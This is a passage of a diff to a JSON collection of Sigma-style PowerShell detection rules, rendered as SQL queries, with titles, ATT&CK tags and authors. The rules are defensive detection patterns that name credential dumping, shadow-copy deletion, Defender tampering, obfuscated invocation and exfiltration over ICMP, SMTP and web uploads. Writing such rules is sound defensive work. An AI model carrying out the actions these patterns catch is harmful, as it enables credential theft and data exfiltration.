ESCAPE '\\' OR ScriptBlockText LIKE '%MiniDumpWriteDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%msvcrt%' ESCAPE '\\' OR ScriptBlockText LIKE '%ntdll%' ESCAPE '\\' OR ScriptBlockText LIKE '%OpenDesktop%' ESCAPE '\\' OR ScriptBlockText LIKE '%OpenProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%OpenProcessToken%' ESCAPE '\\' OR ScriptBlockText LIKE '%OpenThreadToken%' ESCAPE '\\' OR ScriptBlockText LIKE '%OpenWindowStation%' ESCAPE '\\' OR ScriptBlockText LIKE '%QueueUserApc%' ESCAPE '\\' OR ScriptBlockText LIKE '%ReadProcessMemory%' ESCAPE '\\' OR ScriptBlockText LIKE '%RevertToSelf%' ESCAPE '\\' OR ScriptBlockText LIKE '%RtlCreateUserThread%' ESCAPE '\\' OR ScriptBlockText LIKE '%secur32%' ESCAPE '\\' OR ScriptBlockText LIKE '%SetThreadToken%' ESCAPE '\\' OR ScriptBlockText LIKE '%VirtualAlloc%' ESCAPE '\\' OR ScriptBlockText LIKE '%VirtualFree%' ESCAPE '\\' OR ScriptBlockText LIKE '%VirtualProtect%' ESCAPE '\\' OR ScriptBlockText LIKE '%WaitForSingleObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%WriteInt32%' ESCAPE '\\' OR ScriptBlockText LIKE '%WriteProcessMemory%' ESCAPE '\\' OR ScriptBlockText LIKE '%ZeroFreeGlobalAllocUnicode%' ESCAPE '\\') AND NOT ((ScriptBlockText LIKE '# Copyright 2016 Amazon.com, Inc. 
or its affiliates.%' ESCAPE '\\' AND ScriptBlockText LIKE '%function Import-SerialPortUtil %' ESCAPE '\\')))" + ], + "filename": "posh_ps_accessing_win_api.yml" + }, + { + "title": "Powershell Local Email Collection", + "id": "2837e152-93c8-43d2-85ba-c3cd3c2ae614", + "status": "test", + "description": "Adversaries may target user email on local systems to collect sensitive information.\nFiles containing email data can be acquired from a users local system, such as Outlook storage or cache files.\n", "author": "frack113", "tags": [ "attack.collection", - "attack.t1074.001" + "attack.t1114.001" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Compress-Archive %' ESCAPE '\\' AND ScriptBlockText LIKE '% -Path %' ESCAPE '\\' AND ScriptBlockText LIKE '% -DestinationPath %' ESCAPE '\\' AND ScriptBlockText LIKE '%$env:TEMP\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Get-Inbox.ps1%' ESCAPE '\\' OR ScriptBlockText LIKE '%Microsoft.Office.Interop.Outlook%' ESCAPE '\\' OR ScriptBlockText LIKE '%Microsoft.Office.Interop.Outlook.olDefaultFolders%' ESCAPE '\\' OR ScriptBlockText LIKE '%-comobject outlook.application%' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_zip_compress.yml" + "filename": "posh_ps_susp_mail_acces.yml" }, { - "title": "Potential Data Exfiltration Via Audio File", - "id": "e4f93c99-396f-47c8-bb0f-201b1fa69034", + "title": "Import PowerShell Modules From Suspicious Directories", + "id": "21f9162c-5f5d-4b01-89a8-b705bd7d10ab", "status": "experimental", - "description": "Detects potential exfiltration attempt via audio file using PowerShell", + "description": "Detects powershell scripts that import modules from suspicious directories", "author": 
"Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.exfiltration" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%[System.Math]::%' ESCAPE '\\' AND ScriptBlockText LIKE '%[IO.FileMode]::%' ESCAPE '\\' AND ScriptBlockText LIKE '%BinaryWriter%' ESCAPE '\\' AND ScriptBlockText LIKE '%0x52%' ESCAPE '\\' AND ScriptBlockText LIKE '%0x49%' ESCAPE '\\' AND ScriptBlockText LIKE '%0x46%' ESCAPE '\\' AND ScriptBlockText LIKE '%0x57%' ESCAPE '\\' AND ScriptBlockText LIKE '%0x41%' ESCAPE '\\' AND ScriptBlockText LIKE '%0x56%' ESCAPE '\\' AND ScriptBlockText LIKE '%0x45%' ESCAPE '\\' AND ScriptBlockText LIKE '%0xAC%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Import-Module \"$Env:Temp\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%Import-Module ''$Env:Temp\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%Import-Module $Env:Temp\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%Import-Module \"$Env:Appdata\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%Import-Module ''$Env:Appdata\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%Import-Module $Env:Appdata\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%Import-Module C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%ipmo \"$Env:Temp\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%ipmo ''$Env:Temp\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%ipmo $Env:Temp\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%ipmo \"$Env:Appdata\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%ipmo ''$Env:Appdata\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%ipmo $Env:Appdata\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%ipmo C:\\\\Users\\\\Public\\\\%' ESCAPE '\\'))" ], - "filename": "posh_ps_audio_exfiltration.yml" 
+ "filename": "posh_ps_import_module_susp_dirs.yml" }, { - "title": "Invoke-Obfuscation Via Use Clip - Powershell", - "id": "db92dd33-a3ad-49cf-8c2c-608c3e30ace0", - "status": "experimental", - "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", - "author": "Nikita Nazarov, oscd.community", + "title": "Suspicious PowerShell Invocations - Generic", + "id": "ed965133-513f-41d9-a441-e38076a0798f", + "status": "test", + "description": "Detects suspicious PowerShell invocation command parameters", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", "attack.execution", "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Very special / sneaky PowerShell scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '(?i).*?echo.*clip.*&&.*(Clipboard|i`?n`?v`?o`?k`?e`?).*')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '% -enc %' ESCAPE '\\' OR ScriptBlockText LIKE '% -EncodedCommand %' ESCAPE '\\' OR ScriptBlockText LIKE '% -ec %' ESCAPE '\\') AND (ScriptBlockText LIKE '% -w hidden %' ESCAPE '\\' OR ScriptBlockText LIKE '% -window hidden %' ESCAPE '\\' OR ScriptBlockText LIKE '% -windowstyle hidden %' ESCAPE '\\' OR ScriptBlockText LIKE '% -w 1 %' ESCAPE '\\') AND (ScriptBlockText LIKE '% -noni %' ESCAPE '\\' OR ScriptBlockText LIKE '% -noninteractive %' ESCAPE '\\'))" ], - "filename": "posh_ps_invoke_obfuscation_via_use_clip.yml" + "filename": "posh_ps_susp_invocation_generic.yml" }, { - "title": "Deletion of Volume Shadow Copies via WMI with PowerShell - PS Script", - "id": "c1337eb8-921a-4b59-855b-4ba188ddcc42", + "title": "Tamper Windows Defender Remove-MpPreference - ScriptBlockLogging", + "id": "ae2bdd58-0681-48ac-be7f-58ab4e593458", 
"status": "experimental", - "description": "Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil", - "author": "Tim Rauch", + "description": "Detects attempts to remove windows defender configuration using the 'MpPreference' cmdlet", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1490" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Legitimate PowerShell scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Get-WmiObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%gwmi%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-CimInstance%' ESCAPE '\\' OR ScriptBlockText LIKE '%gcim%' ESCAPE '\\') AND ScriptBlockText LIKE '%Win32\\_Shadowcopy%' ESCAPE '\\' AND (ScriptBlockText LIKE '%.Delete()%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-WmiObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%rwmi%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-CimInstance%' ESCAPE '\\' OR ScriptBlockText LIKE '%rcim%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Remove-MpPreference%' ESCAPE '\\' AND (ScriptBlockText LIKE '%-ControlledFolderAccessProtectedFolders %' ESCAPE '\\' OR ScriptBlockText LIKE '%-AttackSurfaceReductionRules\\_Ids %' ESCAPE '\\' OR ScriptBlockText LIKE '%-AttackSurfaceReductionRules\\_Actions %' ESCAPE '\\' OR ScriptBlockText LIKE '%-CheckForSignaturesBeforeRunningScan %' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_win32_shadowcopy_deletion.yml" + "filename": "posh_ps_tamper_defender_remove_mppreference.yml" }, { - "title": "Invoke-Obfuscation Via Stdin - Powershell", - "id": 
"86b896ba-ffa1-4fea-83e3-ee28a4c915c7", + "title": "Windows PowerShell Upload Web Request", + "id": "d2e3f2f6-7e09-4bf2-bc5d-90186809e7fb", "status": "experimental", - "description": "Detects Obfuscated Powershell via Stdin in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Detects the use of various web request POST or PUT methods (including aliases) via Windows PowerShell command", + "author": "frack113", + "tags": [ + "attack.exfiltration", + "attack.t1020" + ], + "falsepositives": [ + "Legitimate script" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR ScriptBlockText LIKE '%iwr %' ESCAPE '\\') AND ScriptBlockText LIKE '%-Method %' ESCAPE '\\' AND (ScriptBlockText LIKE '% Put %' ESCAPE '\\' OR ScriptBlockText LIKE '% Post %' ESCAPE '\\'))" + ], + "filename": "posh_ps_upload.yml" + }, + { + "title": "WMImplant Hack Tool", + "id": "8028c2c3-e25a-46e3-827f-bbb5abf181d7", + "status": "test", + "description": "Detects parameters used by WMImplant", + "author": "NVISO", "tags": [ - "attack.defense_evasion", - "attack.t1027", "attack.execution", + "attack.t1047", "attack.t1059.001" ], + "falsepositives": [ + "Administrative scripts that use the same keywords." 
+ ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%WMImplant%' ESCAPE '\\' OR ScriptBlockText LIKE '% change\\_user %' ESCAPE '\\' OR ScriptBlockText LIKE '% gen\\_cli %' ESCAPE '\\' OR ScriptBlockText LIKE '% command\\_exec %' ESCAPE '\\' OR ScriptBlockText LIKE '% disable\\_wdigest %' ESCAPE '\\' OR ScriptBlockText LIKE '% disable\\_winrm %' ESCAPE '\\' OR ScriptBlockText LIKE '% enable\\_wdigest %' ESCAPE '\\' OR ScriptBlockText LIKE '% enable\\_winrm %' ESCAPE '\\' OR ScriptBlockText LIKE '% registry\\_mod %' ESCAPE '\\' OR ScriptBlockText LIKE '% remote\\_posh %' ESCAPE '\\' OR ScriptBlockText LIKE '% sched\\_job %' ESCAPE '\\' OR ScriptBlockText LIKE '% service\\_mod %' ESCAPE '\\' OR ScriptBlockText LIKE '% process\\_kill %' ESCAPE '\\' OR ScriptBlockText LIKE '% active\\_users %' ESCAPE '\\' OR ScriptBlockText LIKE '% basic\\_info %' ESCAPE '\\' OR ScriptBlockText LIKE '% power\\_off %' ESCAPE '\\' OR ScriptBlockText LIKE '% vacant\\_system %' ESCAPE '\\' OR ScriptBlockText LIKE '% logon\\_events %' ESCAPE '\\'))" + ], + "filename": "posh_ps_wmimplant.yml" + }, + { + "title": "Execution via CL_Mutexverifiers.ps1", + "id": "39776c99-1c7b-4ba0-b5aa-641525eee1a4", + "status": "test", + "description": "Detects Execution via runAfterCancelProcess in CL_Mutexverifiers.ps1 module", + "author": "oscd.community, Natalia Shornikova", + "tags": [ + "attack.defense_evasion", + "attack.t1216" + ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '(?i).*(set).*&&\\s?set.*(environment|invoke|\\$\\{?input).*&&.*\"')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND 
ScriptBlockText LIKE '%CL\\_Mutexverifiers.ps1%' ESCAPE '\\' AND ScriptBlockText LIKE '%runAfterCancelProcess%' ESCAPE '\\')" ], - "filename": "posh_ps_invoke_obfuscation_via_stdin.yml" + "filename": "posh_ps_cl_mutexverifiers_lolscript.yml" }, { - "title": "Suspicious FromBase64String Usage On Gzip Archive - Ps Script", - "id": "df69cb1d-b891-4cd9-90c7-d617d90100ce", - "status": "experimental", - "description": "Detects attempts of decoding a base64 Gzip archive in a PowerShell script. This technique is often used as a method to load malicious content into memory afterward.", + "title": "Dump Credentials from Windows Credential Manager With PowerShell", + "id": "99c49d9c-34ea-45f7-84a7-4751ae6b2cbc", + "status": "test", + "description": "Adversaries may search for common password storage locations to obtain user credentials.\nPasswords are stored in several places on a system, depending on the operating system or application holding the credentials.\n", "author": "frack113", + "tags": [ + "attack.credential_access", + "attack.t1555" + ], "falsepositives": [ - "Legitimate administrative script" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%FromBase64String%' ESCAPE '\\' AND ScriptBlockText LIKE '%MemoryStream%' ESCAPE '\\' AND ScriptBlockText LIKE '%H4sI%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%Get-PasswordVaultCredentials%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-CredManCreds%' ESCAPE '\\') OR (ScriptBlockText LIKE '%New-Object%' ESCAPE '\\' AND ScriptBlockText LIKE '%Windows.Security.Credentials.PasswordVault%' ESCAPE '\\') OR (ScriptBlockText LIKE '%New-Object%' ESCAPE '\\' AND ScriptBlockText LIKE '%Microsoft.CSharp.CSharpCodeProvider%' ESCAPE '\\' AND 
ScriptBlockText LIKE '%[System.Runtime.InteropServices.RuntimeEnvironment]::GetRuntimeDirectory())%' ESCAPE '\\' AND ScriptBlockText LIKE '%Collections.ArrayList%' ESCAPE '\\' AND ScriptBlockText LIKE '%System.CodeDom.Compiler.CompilerParameters%' ESCAPE '\\')))" ], - "filename": "posh_ps_frombase64string_archive.yml" + "filename": "posh_ps_dump_password_windows_credential_manager.yml" }, { - "title": "Suspicious Get-ADReplAccount", - "id": "060c3ef1-fd0a-4091-bf46-e7d625f60b73", + "title": "Suspicious Mount-DiskImage", + "id": "29e1c216-6408-489d-8a06-ee9d151ef819", "status": "test", - "description": "The DSInternals PowerShell Module exposes several internal features of Active Directory and Azure Active Directory.\nThese include FIDO2 and NGC key auditing, offline ntds.dit file manipulation, password auditing, DC recovery from IFM backups and password hash calculation.\n", + "description": "Adversaries may abuse container files such as disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW.", "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003.006" + "attack.defense_evasion", + "attack.t1553.005" ], "falsepositives": [ "Legitimate PowerShell scripts" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-ADReplAccount%' ESCAPE '\\' AND ScriptBlockText LIKE '%-All %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Server %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Mount-DiskImage %' ESCAPE '\\' AND ScriptBlockText LIKE '%-ImagePath %' ESCAPE '\\')" ], - "filename": "posh_ps_get_adreplaccount.yml" + "filename": "posh_ps_susp_mount_diskimage.yml" }, { - "title": "Computer Discovery And Export Via 
Get-ADComputer Cmdlet - PowerShell", - "id": "db885529-903f-4c5d-9864-28fe199e6370", - "status": "experimental", - "description": "Detects usage of the Get-ADComputer cmdlet to collect computer information and output it to a file", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "PowerShell ICMP Exfiltration", + "id": "4c4af3cd-2115-479c-8193-6b8bfce9001c", + "status": "test", + "description": "Detects Exfiltration Over Alternative Protocol - ICMP. Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.", + "author": "Bartlomiej Czyz @bczyz1, oscd.community", "tags": [ - "attack.discovery", - "attack.t1033" + "attack.exfiltration", + "attack.t1048.003" ], "falsepositives": [ - "Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often" + "Legitimate usage of System.Net.NetworkInformation.Ping class" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-ADComputer %' ESCAPE '\\' AND ScriptBlockText LIKE '% -Filter \\*' ESCAPE '\\' AND (ScriptBlockText LIKE '% | Select %' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-File%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-Content%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-Content%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-Object%' ESCAPE '\\' AND ScriptBlockText LIKE '%System.Net.NetworkInformation.Ping%' ESCAPE '\\' AND ScriptBlockText LIKE '%.Send(%' ESCAPE '\\')" ], - "filename": "posh_ps_computer_discovery_get_adcomputer.yml" + "filename": "posh_ps_icmp_exfiltration.yml" }, { - "title": "Powershell Exfiltration Over SMTP", - "id": 
"9a7afa56-4762-43eb-807d-c3dc9ffe211b", - "status": "experimental", - "description": "Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.\nThe data may also be sent to an alternate network location from the main command and control server.\n", - "author": "frack113", + "title": "Deletion of Volume Shadow Copies via WMI with PowerShell - PS Script", + "id": "c1337eb8-921a-4b59-855b-4ba188ddcc42", + "status": "experimental", + "description": "Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil", + "author": "Tim Rauch", "tags": [ - "attack.exfiltration", - "attack.t1048.003" + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "Legitimate script" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ScriptBlockText LIKE '%Send-MailMessage%' ESCAPE '\\' AND NOT (ScriptBlockText LIKE '%CmdletsToExport%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Get-WmiObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%gwmi%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-CimInstance%' ESCAPE '\\' OR ScriptBlockText LIKE '%gcim%' ESCAPE '\\') AND ScriptBlockText LIKE '%Win32\\_Shadowcopy%' ESCAPE '\\' AND (ScriptBlockText LIKE '%.Delete()%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-WmiObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%rwmi%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-CimInstance%' ESCAPE '\\' OR ScriptBlockText LIKE '%rcim%' ESCAPE '\\'))" ], - "filename": "posh_ps_send_mailmessage.yml" + "filename": "posh_ps_susp_win32_shadowcopy_deletion.yml" }, { - "title": "Suspicious 
PowerShell Download - Powershell Script", - "id": "403c2cc0-7f6b-4925-9423-bfa573bed7eb", + "title": "Suspicious Get-WmiObject", + "id": "0332a266-b584-47b4-933d-a00b103e1b37", "status": "experimental", - "description": "Detects suspicious PowerShell download command", - "author": "Florian Roth (Nextron Systems)", + "description": "The infrastructure for management data and operations that enables local and remote management of Windows personal computers and servers", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.persistence", + "attack.t1546" ], "falsepositives": [ - "PowerShell scripts that download content from the Internet" + "Legitimate PowerShell scripts" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%System.Net.WebClient%' ESCAPE '\\' AND (ScriptBlockText LIKE '%.DownloadFile(%' ESCAPE '\\' OR ScriptBlockText LIKE '%.DownloadString(%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Get-WmiObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%gwmi%' ESCAPE '\\') AND NOT ((Path LIKE '%\\\\CL\\_Utility.ps1' ESCAPE '\\' AND ScriptBlockText LIKE '%function Get-FreeSpace%' ESCAPE '\\' AND ScriptBlockText LIKE '%SELECT % FROM Win32\\_LogicalDisk WHERE MediaType=12%' ESCAPE '\\')))" ], - "filename": "posh_ps_susp_download.yml" + "filename": "posh_ps_susp_gwmi.yml" }, { - "title": "Create Volume Shadow Copy with Powershell", - "id": "afd12fed-b0ec-45c9-a13d-aa86625dac81", - "status": "test", - "description": "Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information", + "title": "Zip A Folder With PowerShell For Staging In Temp - PowerShell Script", + "id": 
"b7a3c9a3-09ea-4934-8864-6a32cacd98d9", + "status": "experimental", + "description": "Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration", "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003.003" + "attack.collection", + "attack.t1074.001" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%win32\\_shadowcopy%' ESCAPE '\\' AND ScriptBlockText LIKE '%).Create(%' ESCAPE '\\' AND ScriptBlockText LIKE '%ClientAccessible%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Compress-Archive %' ESCAPE '\\' AND ScriptBlockText LIKE '% -Path %' ESCAPE '\\' AND ScriptBlockText LIKE '% -DestinationPath %' ESCAPE '\\' AND ScriptBlockText LIKE '%$env:TEMP\\\\%' ESCAPE '\\')" ], - "filename": "posh_ps_create_volume_shadow_copy.yml" + "filename": "posh_ps_susp_zip_compress.yml" }, { "title": "Unsigned AppX Installation Attempt Using Add-AppxPackage - PsScript", 
@@ -7998,6674 +7627,6720 @@ "filename": "posh_ps_install_unsigned_appx_packages.yml" }, { - "title": "Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell", - "id": "1b9dc62e-6e9e-42a3-8990-94d7a10007f7", + "title": "Usage Of Web Request Commands And Cmdlets - ScriptBlock", + "id": "1139d2e2-84b1-4226-b445-354492eba8ba", "status": "experimental", - "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block \\u2014", - "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", + "description": "Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases) via PowerShell scriptblock logs", + "author": "James Pemberton / @4A616D6573", "tags": [ - "attack.defense_evasion", - "attack.t1027", "attack.execution", "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Use of Get-Command and Get-Help modules to reference Invoke-WebRequest and Start-BitsTransfer." 
], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR ScriptBlockText REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR ScriptBlockText REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR ScriptBlockText REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR ScriptBlockText REGEXP '\\*mdr\\*\\W\\s*\\)\\.Name' OR ScriptBlockText REGEXP '\\$VerbosePreference\\.ToString\\('))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR ScriptBlockText LIKE '%iwr %' ESCAPE '\\' OR ScriptBlockText LIKE '%wget %' ESCAPE '\\' OR ScriptBlockText LIKE '%curl %' ESCAPE '\\' OR ScriptBlockText LIKE '%Net.WebClient%' ESCAPE '\\' OR ScriptBlockText LIKE '%Start-BitsTransfer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Resume-BitsTransfer%' ESCAPE '\\' OR ScriptBlockText LIKE '%[System.Net.WebRequest]::create%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-RestMethod%' ESCAPE '\\' OR ScriptBlockText LIKE '%WinHttp.WinHttpRequest%' ESCAPE '\\') AND NOT (Path LIKE 'C:\\\\Packages\\\\Plugins\\\\Microsoft.GuestConfiguration.ConfigurationforWindows\\\\%' ESCAPE '\\'))" ], - "filename": "posh_ps_invoke_obfuscation_obfuscated_iex.yml" + "filename": "posh_ps_web_request_cmd_and_cmdlets.yml" }, { - "title": "Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell", - "id": "e6cb92b4-b470-4eb8-8a9d-d63e8583aae0", + "title": "Suspicious GPO Discovery With Get-GPO", + "id": "eb2fd349-ec67-4caa-9143-d79c7fb34441", "status": "experimental", - "description": "Detects Obfuscated Powershell via RUNDLL LAUNCHER", - "author": "Timur Zinniatullin, oscd.community", + "description": "Detect use of Get-GPO to get one 
GPO or all the GPOs in a domain.", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.discovery", + "attack.t1615" ], "falsepositives": [ - "Unknown" + "Legitimate PowerShell scripts" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%rundll32.exe%' ESCAPE '\\' AND ScriptBlockText LIKE '%shell32.dll%' ESCAPE '\\' AND ScriptBlockText LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND ScriptBlockText LIKE '%powershell%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-GPO%' ESCAPE '\\')" ], - "filename": "posh_ps_invoke_obfuscation_via_rundll.yml" + "filename": "posh_ps_susp_get_gpo.yml" }, { - "title": "Suspicious Unblock-File", - "id": "5947497f-1aa4-41dd-9693-c9848d58727d", + "title": "Powershell Timestomp", + "id": "c6438007-e081-42ce-9483-b067fbef33c3", "status": "test", - "description": "Remove the Zone.Identifier alternate data stream which identifies the file as downloaded from the internet.", + "description": "Adversaries may modify file time attributes to hide new or changes to existing files.\nTimestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder.\n", "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1553.005" + "attack.t1070.006" ], "falsepositives": 